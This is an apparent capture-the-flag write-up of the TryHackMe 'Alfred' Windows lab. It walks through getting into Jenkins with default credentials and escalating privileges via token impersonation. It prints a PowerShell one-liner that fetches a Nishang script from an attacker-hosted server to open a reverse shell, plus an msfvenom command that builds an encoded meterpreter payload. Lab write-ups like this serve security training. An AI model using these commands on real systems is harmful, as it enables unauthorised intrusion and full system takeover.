TryHackMe – Alfred Writeup
Hello and welcome to my second TryHackMe writeup. Today we are doing a Windows machine called “Alfred“, a part of OSCP learning path. By doing this machine you will learn how to exploit a common misconfiguration in Jenkins to gain an initial shell and privilege escalation to get full system access.
Lets us start.
Let us start off with intense NMAP scan with no ping.
The namp scan shows 3 common ports are open, a port 80, 3389 and 8080. There are two web-servers running. A Microsoft IIS on 80 and Jetty 9.4 on port 8080.
So browsing through the web server on port 80 we noticed it hosts a simple website having a picture of Bruce Wayne saying RIP Bruce Wayne and requesting donations. 🙂 And the most interesting part is on port 8080 which hosts Jenkins app.
When I saw the picture of Bruce Wayne I understood the machine name Alfred is none other than Bruce’s loyal butler Alfred Thaddeus Crane Pennyworth. :), that’s cool.
Ok, coming to the point, I tried admin:***** as login credentials for Jenkins portal and fortunately it was accepted. I’m logged-in to the dashboard as admin.
I tried the same credentials to access the system using RDP client but the credentials were not accepted.
A quick search using SearchSploit returned with a number of Jenkins exploits but the installed Jenkins version 2.190.1 has no exploits listed.
Getting Reverse Shell As User Jenkins
Since this is a Windows machine and as advised by THM, I’m going to use Nishang Invoke-PowerShellTcp PowerShell script to get reverse shell. First, I we need to import the PowerShell script in to the machine. So, let us host the Python SimpleHTTP server from the working directory of Alfred.
From the Project Config menu → Build Environment tab → Build, I can execute the windows commands.
So getting reverse-shell is easy. I used Nishang to gain initial access.
powershell iex (New-Object Net.WebClient).DownloadString('http://your-ip:your-port/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress your-ip -Port your-port
Here is my final PowerShell command:
Once the command is ready, paste it into the command prompt and click on Save and Apply. Then click on Build Now:
As soon as you click on Build Now, you will see the hit in your Python HTTP server and you will see the updated Build history like below screenshot.
Once the build is completed, my listener was activated and I have reverse shell as alfred\bruce.
I found the user.txt from Bruce’s desktop.
TASK II: Switching Shells: Upgrading PS Shell to Meterpreter Shell
Meterpreter shell is always handy, you can switch between sessions, shells and it makes exploit easy. So as suggested by THM let us upgrade current shell to meterpreter.
I create the meterpreter reverse shell payload using the following command:
msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=[IP] LPORT=[PORT] -f exe -o [SHELL NAME].exe
I set up my Metasploit multi/handler
Then, run the PowerShell download command:
And run the Start-Process “nav1n.exe” to execute my payload.
And I have proper meterpreter shell:
Task 3: Privilege Escalation
Now that we have initial access as Alfred, let’s use token impersonation to gain the system access.
Windows uses tokens to ensure that accounts have the right privileges to carry out particular actions. Account tokens are assigned to an account when users log in or are authenticated. This is usually done by LSASS.exe(think of this as an authentication process).
This access token consists of:
- user SIDs(security identifier)
- group SIDs
- privileges (ref: https://docs.microsoft.com/en-us/windows/win32/secauthz/access-tokens)
Listing Windows Tokens in Meterpreter:
As we can see BUILTIN\Administrator tokens are available, let us use the impersonate_token “BUILTIN\Administrators” command to impersonate the Administrators token.
And I read the root.txt from
Thank you for reading.